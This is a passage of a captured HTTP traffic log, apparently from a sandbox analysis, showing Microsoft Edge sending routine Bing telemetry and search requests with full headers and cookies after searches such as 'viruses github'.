_EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 8619
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144344.fb67d69
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20github%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144348713%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Autosuggest%22%2C%22TS%22%3A1728144348729%2C%22Name%22%3A%22MouseClick%22%2C%22FID%22%3A%22Suggestion%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20github%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144348713%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Autosuggest%22%2C%22TS%22%3A1728144348729%2C%22Name%22%3A%22MouseClick%22%2C%22FID%22%3A%22Suggestion%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144349.fb67e1f
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 1554
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144349.fb6a9c5
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144349.fb6ab3e
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:163,%22BC%22:163,%22SE%22:-1,%22TC%22:-1,%22H%22:886,%22BP%22:1041,%22CT%22:1042,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,2043,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:163,%22BC%22:163,%22SE%22:-1,%22TC%22:-1,%22H%22:886,%22BP%22:1041,%22CT%22:1042,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,2043,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144350.fb6ad18
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350328%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350328%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144351.fb6b37d
GET

https://www.bing.com/images/sbi?mmasync=1&ig=1D2FDF991A984BF98138E4B738C9DC15&iid=.5092&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /images/sbi?mmasync=1&ig=1D2FDF991A984BF98138E4B738C9DC15&iid=.5092&ptn=Web&ep=0&iconpl=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 3286
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163dfbca04c6b8a1ef79792ffe145
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-yGc1Fs+mleBFWdRpJu31K2v609w3tVyUIgzK4l7jc4w='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
